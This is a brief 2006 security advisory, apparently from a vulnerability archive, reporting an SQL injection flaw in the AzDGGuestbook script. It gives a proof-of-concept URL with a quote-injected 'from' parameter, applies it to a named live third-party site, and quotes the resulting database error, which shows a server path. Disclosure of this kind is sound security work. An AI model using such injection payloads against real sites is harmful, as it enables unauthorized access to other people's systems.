AzDGGuestbook SQL Injection Vulnerability

2006-06-05T00:00:00
ID SECURITYVULNS:DOC:12975
Type securityvulns
Reporter Securityvulns
Modified 2006-06-05T00:00:00

Description

AzDGGuestbook SQL Injection Vulnerability

Credit : SpC-x | The-BeKiR

Site : http://wWw.SaVSaK.CoM

Greetz :

| Nukedx | Ejder | Str0ke | joffer | Poizonb0x |

Code :

http://www.target.com/path/?l=default&from='-'

Example :

http://www.russianhelsinki.com/guestbook/?l=default&from='-'

Error Message :

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/home/iljab/russianhelsinki.com/guestbook/index.php on line 76

/SpC-x

--


Get your free email from http://mymail.bsdmail.com